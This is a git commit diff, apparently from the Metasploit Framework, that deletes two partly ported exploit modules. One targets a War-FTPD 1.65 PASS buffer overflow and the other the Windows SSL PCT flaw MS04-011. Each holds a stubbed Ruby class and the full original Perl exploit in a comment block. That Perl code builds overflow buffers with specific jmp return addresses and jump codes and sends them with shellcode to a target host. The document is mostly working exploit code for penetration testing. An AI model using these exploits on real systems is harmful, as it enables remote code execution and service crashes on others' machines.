Watftpd is not going to make it
SSL ported git-svn-id: file:///home/svn/incoming/trunk@3127 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
e2ab431a57
commit
ab597b4172
|
@ -1,178 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'War-FTPD 1.65 PASS Overflow',
|
||||
'Description' => %q{
|
||||
This exploits the buffer overflow found in the PASS command
|
||||
in War-FTPD 1.65. This particular module will only work
|
||||
reliably against Windows 2000 targets. The server must be
|
||||
configured to allow anonymous logins for this exploit to
|
||||
succeed. A failed attempt will bring down the service
|
||||
completely.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '875'],
|
||||
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html'],
|
||||
[ 'MIL', '74'],
|
||||
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 512,
|
||||
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32, win2000',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 19 1998',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::warftpd_165_pass;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'War-FTPD 1.65 PASS Overflow',
|
||||
'Version' => '$Revision$',
|
||||
|
||||
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32', 'win2000' ],
|
||||
'Priv' => 0,
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 80],
|
||||
'SSL' => [0, 'BOOL', 'Use SSL'],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 512,
|
||||
'BadChars' => "\x00+&=%\x0a\x0d\x20",
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This exploits the buffer overflow found in the PASS command
|
||||
in War-FTPD 1.65. This particular module will only work
|
||||
reliably against Windows 2000 targets. The server must be
|
||||
configured to allow anonymous logins for this exploit to
|
||||
succeed. A failed attempt will bring down the service
|
||||
completely.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '875'],
|
||||
['URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html'],
|
||||
['MIL', '74'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' => [ ["Windows 2000"] ],
|
||||
|
||||
'Keys' => ['warftpd'],
|
||||
|
||||
'DisclosureDate' => 'Mar 19 1998',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
|
||||
my $request = ("META" x 1024);
|
||||
|
||||
# this return address is a jmp ebx in the included MFC42.DLL
|
||||
substr($request, 562, 4, pack("V", 0x5f4e772b));
|
||||
|
||||
substr($request, 558, 4, "\xeb\x08\xeb\x08");
|
||||
substr($request, 566, length($shellcode), $shellcode);
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $r = $s->Recv(-1, 20);
|
||||
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
|
||||
|
||||
$self->PrintLine("[*] REMOTE> $r");
|
||||
$r = $s->Recv(-1, 10);
|
||||
|
||||
$s->Send("USER ANONYMOUS\n");
|
||||
$r = $s->Recv(-1, 20);
|
||||
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
|
||||
$self->PrintLine("[*] REMOTE> $r");
|
||||
|
||||
$s->Send("PASS $request\n");
|
||||
$r = $s->Recv(-1, 20);
|
||||
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
|
||||
$self->PrintLine("[*] REMOTE> $r");
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -1,236 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SSL PCT MS04-011 Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the Microsoft
|
||||
Windows SSL PCT protocol stack. This code is based on Johnny
|
||||
Cyberpunk's THC release and has been tested against Windows
|
||||
2000 and Windows XP. To use this module, specify the remote
|
||||
port of any SSL service, or the port and protocol of an
|
||||
application that uses SSL. The only application protocol
|
||||
supported at this time is SMTP. You only have one chance to
|
||||
select the correct target, if you are attacking IIS, you may
|
||||
want to try one of the other exploits first (WebDAV). If
|
||||
WebDAV does not work, this more than likely means that this
|
||||
is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS
|
||||
5.1). Using the wrong target may not result in an immediate
|
||||
crash of the remote system.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'Johnny Cyberpunk <jcyberpunk@thc.org> [Unknown License]' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '5250'],
|
||||
[ 'MSB', 'MS04-011'],
|
||||
[ 'MIL', '77'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1800,
|
||||
'BadChars' => "",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32, win2000, winxp',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 13 2004',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::windows_ssl_pct;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Microsoft SSL PCT MS04-011 Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' =>
|
||||
[
|
||||
'H D Moore <hdm [at] metasploit.com>',
|
||||
'Johnny Cyberpunk <jcyberpunk [at] thc.org> [Unknown License]'
|
||||
],
|
||||
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32', 'win2000', 'winxp' ],
|
||||
'Priv' => 1,
|
||||
|
||||
'AutoOpts' => { 'EXITFUNC' => 'thread' },
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 443],
|
||||
'PROTO' => [0, 'DATA', 'The application protocol (raw or smtp)', 'raw'],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'MinNops' => 0,
|
||||
'MaxNops' => 0,
|
||||
'Space' => 1800,
|
||||
'BadChars' => '',
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a buffer overflow in the Microsoft Windows SSL PCT
|
||||
protocol stack. This code is based on Johnny Cyberpunk's THC release
|
||||
and has been tested against Windows 2000 and Windows XP. To use this module,
|
||||
specify the remote port of any SSL service, or the port and protocol of
|
||||
an application that uses SSL. The only application protocol supported at
|
||||
this time is SMTP. You only have one chance to select the correct target,
|
||||
if you are attacking IIS, you may want to try one of the other exploits
|
||||
first (WebDAV). If WebDAV does not work, this more than likely means that
|
||||
this is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS 5.1). Using
|
||||
the wrong target may not result in an immediate crash of the remote system.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '5250'],
|
||||
['MSB', 'MS04-011'],
|
||||
['MIL', '77'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows 2000 SP4', 0x67419ce8], # jmp [esp + 0x6c]
|
||||
['Windows 2000 SP3', 0x67419e1d], # jmp [esp + 0x6c]
|
||||
['Windows 2000 SP2', 0x6741a426], # jmp [esp + 0x6c]
|
||||
['Windows 2000 SP1', 0x77e4f44d], # jmp [ebx + 0x14]
|
||||
['Windows 2000 SP0', 0x7658a6cb], # jmp [ebx + 0x0e]
|
||||
['Windows XP SP0', 0x0ffb7de9], # jmp [esp + 0x6c]
|
||||
['Windows XP SP1', 0x0ffb832f], # jmp [esp + 0x6c]
|
||||
['Debugging Target', 0x01020304], # -----------------
|
||||
],
|
||||
|
||||
'Keys' => ['ssl', 'lsass'],
|
||||
|
||||
'DisclosureDate' => 'Apr 13 2004',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
|
||||
my $proto = $self->GetVar('PROTO');
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
|
||||
|
||||
# this is a heap ptr to the ssl request
|
||||
# ... and just happens to not die
|
||||
# thanks to Core ST, Halvar, JohnnyC :)
|
||||
#
|
||||
# 80620101 => and byte ptr [esi+1], 0x2
|
||||
# bd00010001 => mov ebp, 0x1000100
|
||||
# 0016 => add [esi], dl
|
||||
# 8f8201000000 => pop [esi+1]
|
||||
# eb0f => jmp short 11 to shellcode
|
||||
|
||||
my $request =
|
||||
"\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00".
|
||||
"\xeb\x0f".'XXXXXXXXXXX'.pack('V', ($target->[1] ^ 0xffffffff)).
|
||||
$shellcode;
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => 0,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $res;
|
||||
|
||||
# Exploit via SMTP and STARTTLS
|
||||
if ($proto =~ /smtp/i) {
|
||||
$res = $s->Recv(-1, 45);
|
||||
$res =~ s/\r|\n//g;
|
||||
$self->PrintLine("[*] REMOTE> $res");
|
||||
|
||||
$s->Send("HELO METASPLOIT.COM\r\n");
|
||||
$res = $s->Recv(-1, 5);
|
||||
$res =~ s/\r|\n//g;
|
||||
$self->PrintLine("[*] REMOTE> $res");
|
||||
|
||||
$s->Send("STARTTLS\r\n");
|
||||
$res = $s->Recv(-1, 5);
|
||||
$res =~ s/\r|\n//g;
|
||||
$self->PrintLine("[*] REMOTE> $res");
|
||||
|
||||
if ($res !~ /^220.*SMTP server ready/) {
|
||||
$self->PrintLine("[*] Invalid response to STARTTLS");
|
||||
return(0);
|
||||
}
|
||||
}
|
||||
|
||||
$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
|
||||
$s->Send($request);
|
||||
|
||||
$self->PrintLine("[*] Waiting for a response...");
|
||||
$res = $s->Recv(-1, 5);
|
||||
|
||||
if ($res && $res eq "\x00\x00\x01") {
|
||||
$self->PrintLine("[*] Response indicates that PCT is disabled");
|
||||
}
|
||||
|
||||
return(0);
|
||||
}
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue